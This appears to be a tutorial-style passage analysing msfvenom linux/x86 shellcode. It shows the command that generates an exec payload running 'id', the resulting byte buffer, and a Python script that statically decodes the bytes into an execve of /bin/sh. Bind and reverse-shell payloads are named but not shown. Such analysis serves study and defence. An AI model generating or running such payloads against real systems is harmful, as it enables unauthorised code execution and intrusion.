Today I will analyze the following shellcodes generated by msfvenom for the linux/x86 platform:
linux/x86/exec — Execute an arbitrary command
linux/x86/shell_bind_tcp — Listen for a connection and spawn a command shell
linux/x86/shell_reverse_tcp — Connect back to attacker and spawn a command shell
1) linux/x86/exec
This payload executes an arbitrary command that you specify when creating the payload. Let's create the payload with the Linux command id:
# msfvenom -p linux/x86/exec CMD=id -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 38 bytes
Final size of c file: 185 bytes
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x69"
"\x64\x00\x57\x53\x89\xe1\xcd\x80";
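Before handing the bytes to a disassembler, a quick static triage of the buffer alone already recovers the syscall and the argv this payload builds. The following Python script is an added example, not code from the original post or from Metasploit: it parses the C buffer above, names the syscall from the push imm8 / pop eax pair, and rebuilds the strings the shellcode pushes onto the stack or hides behind a call. The syscall-number table and the byte-pattern heuristics are assumptions chosen for how msfvenom lays out these payloads, not a general disassembler.

```python
import re

# Constructed sample input: the linux/x86/exec CMD=id buffer quoted on this page.
C_BUF = r'''unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x69"
"\x64\x00\x57\x53\x89\xe1\xcd\x80";'''
# 32-bit Linux syscall numbers (syscall_32.tbl) that these three payloads rely on.
SYSCALL_NAMES = {1: "exit", 11: "execve", 63: "dup2", 102: "socketcall"}

def parse_c_buffer(text):
    """Convert the \\xNN escapes of a msfvenom -f c buffer into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))

def syscalls(code):
    """Heuristic: 'push imm8; pop eax' (6a NN 58) loads the syscall number, cd 80 invokes it."""
    nums = [m[0] for m in re.findall(rb"\x6a(.)\x58", code, re.DOTALL)]
    return [(n, SYSCALL_NAMES.get(n, "unknown")) for n in nums], code.count(b"\xcd\x80")

def stack_strings(code):
    """Rebuild strings built by runs of push imm32 (68 ..) / push imm16 (66 68 ..).
    The stack grows downward, so the immediates sit in memory in reverse push order."""
    out, run, i = [], [], 0
    while i <= len(code):
        if i + 5 <= len(code) and code[i] == 0x68:                # push imm32
            run.append(code[i + 1:i + 5]); i += 5; continue
        if i + 4 <= len(code) and code[i:i + 2] == b"\x66\x68":  # push imm16
            run.append(code[i + 2:i + 4]); i += 4; continue
        if run:                                                   # run ended: join it
            out.append(b"".join(reversed(run)).rstrip(b"\x00").decode("latin-1"))
            run = []
        i += 1
    return out

def call_embedded_strings(code):
    """'call rel32' (e8) over NUL-terminated data pushes the data's address (call/pop trick)."""
    out = []
    for m in re.finditer(rb"\xe8(.{4})", code, re.DOTALL):
        rel = int.from_bytes(m.group(1), "little", signed=True)
        data = code[m.end():m.end() + rel]
        if rel > 0 and data.endswith(b"\x00"):
            out.append(data.rstrip(b"\x00").decode("latin-1"))
    return out

def analyze(text):
    """What the bytes reveal before any disassembly: here execve of /bin/sh -c id."""
    code = parse_c_buffer(text)
    calls, traps = syscalls(code)
    return {"size": len(code), "syscalls": calls, "int80_count": traps,
            "stack_strings": stack_strings(code), "call_strings": call_embedded_strings(code)}
```

Running analyze(C_BUF) reports a 38-byte blob with one int 0x80, syscall 11 (execve), the stack-built strings "-c" and "/bin/sh", and the call-hidden string "id", which matches what the disassembly below confirms instruction by instruction.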
Then we will use ndisasm, the Netwide Disassembler, to disassemble the generated shellcode.